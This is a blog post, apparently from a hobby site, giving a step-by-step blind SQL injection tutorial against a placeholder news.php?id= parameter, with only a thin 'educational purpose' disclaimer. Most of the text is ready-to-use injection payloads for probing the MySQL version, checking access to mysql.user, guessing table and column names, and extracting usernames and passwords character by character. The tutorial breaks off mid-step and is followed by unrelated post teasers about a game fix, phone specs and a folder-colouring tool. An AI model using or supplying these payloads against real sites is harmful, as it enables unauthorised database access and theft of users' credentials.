Blind Sql Injection Tutorial

By Anime World -

Blind Sql Injection Tutorial:

Note : Only For Educational Purpose.>!!!

Let's start with advanced stuff.
I will be using our example
http://www.site.com/news.php?id=5
when we execute this, we see some articles on that page, pictures etc...
then when we want to test it for blind sql injection attack
http://www.site.com/news.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's ok.
now the real test
http://www.site.com/news.php?id=5 and 1=2 <--- this is false
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.
Steps -
1) Get the MySQL version
to get the version in blind attack we use substring
i.e 
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5. i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don't work then we use subselect
i.e http://www.site.com/news.php?id=5 and (select 1)=1
if page loads normally then subselects work.
then we gonna see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend :)
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)
let's say that we have found that table name is users, now what we need is column name.
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, hi

Comments

Post a Comment

Popular posts from this blog

Solved - Can’t Find 640×480 Video Mode for GTA Vice City!

By Anime World -
Image
Solved - Can’t Find 640×480 Video Mode for GTA Vice City! hello friends, I saw it was throwing a message “Can’t find 640×480 video mode”. It simply means the game’s resolution is not compatible the Windows resolution. Here’s How to Fix “Can’t Find 640×480 Video Mode” for GTA Vice City! Here’s how I changed the game’s compatibility mode to make it compatible with my laptop’s Windows version and it’s resolution. It’s very simple to change game’s compatibility mode to fix “can’t find 640×480 video mode” error. First of all, just  right click on the game icon  and  choose Properties . In the Properties window, just  click on Compatibility tab  and  tick the option “Run this program in compatibility mode for” , and finally  choose the version of Windows operating you’re currently using . That’s all. After choose the Windows version that’s running in your computer/laptop, just apply the changes and  click on OK . Now, try openin...
Read more

NEW Nokia 3 vs Nokia 5 vs Nokia 6 specification and reviews

By Anime World -
Image
NEW Nokia 3 vs Nokia 5 vs Nokia 6 specification and reviews DETAILS Nokia 5 Nokia 3 Nokia 6 GENERAL Alternate names - - Six Release date February 2017 February 2017 January 2017 Dimensions (mm) 149.70 x 72.50 x 8.05 143.40 x 71.40 x 8.48 154.00 x 75.80 x 7.85 Weight (g) - - 167.00 Battery capacity (mAh) 3000 2650 3000 Removable battery No No No Colours Tempered Blue, Copper, Matte Black, Silver Silver White, Matte Black, Tempered Blue, Copper White Arte Black, Matte Black, Tempered Blue, Silver, Copper DISPLAY Screen size (inches) 5.20 5.00 5.50 Resolution 720x1280 pixels 720x1280 pixels 1080x1920 pixels Pixels per inch (PPI) - - 403 HARDWARE Processor octa-core 1.3GHz quad-core 1.1GHz octa-core Processor make Qualcomm Snapdragon 430 MediaTek 6737 Qualcomm Snapdragon 430 processor RAM 2GB 2GB 3GB Internal storage 16GB 16GB 32GB Expandable storage Yes Yes Yes Expandable storage type microSD microSD microSD Expandable storage up to (GB) 128 128 128...
Read more

Customize forlders with different colors in windows

By Anime World -
Image
CUSTOMIZE FOLDERS WITH DIFFERENT COLORS IN WINDOWS There are many softwares available today over the internet which can  Customize your Computer  in an efficient manner that it looks so attractive as well as it becomes very easy to use. We always want our computer to be clean and well organized so that whenever we need to access something or need to search a particular file/folder in our computer we could find it easily. As similar to that, here I am going to share a software through which you can easily assign your favorite colors to your desired folders in order to differentiate them easily and to ease of access. HOW DO I CUSTOMIZE FOLDERS WITH DIFFERENT COLORS ? Just follow the two simple steps given below to customize your folder : STEP 1 : First of all Download and install the software FolderColorizer. It is tested and 100% virus free. You can download it from here : DOWNLOAD FOLDERCOLORIZER STEP 2 : Now after installing the s...
Read more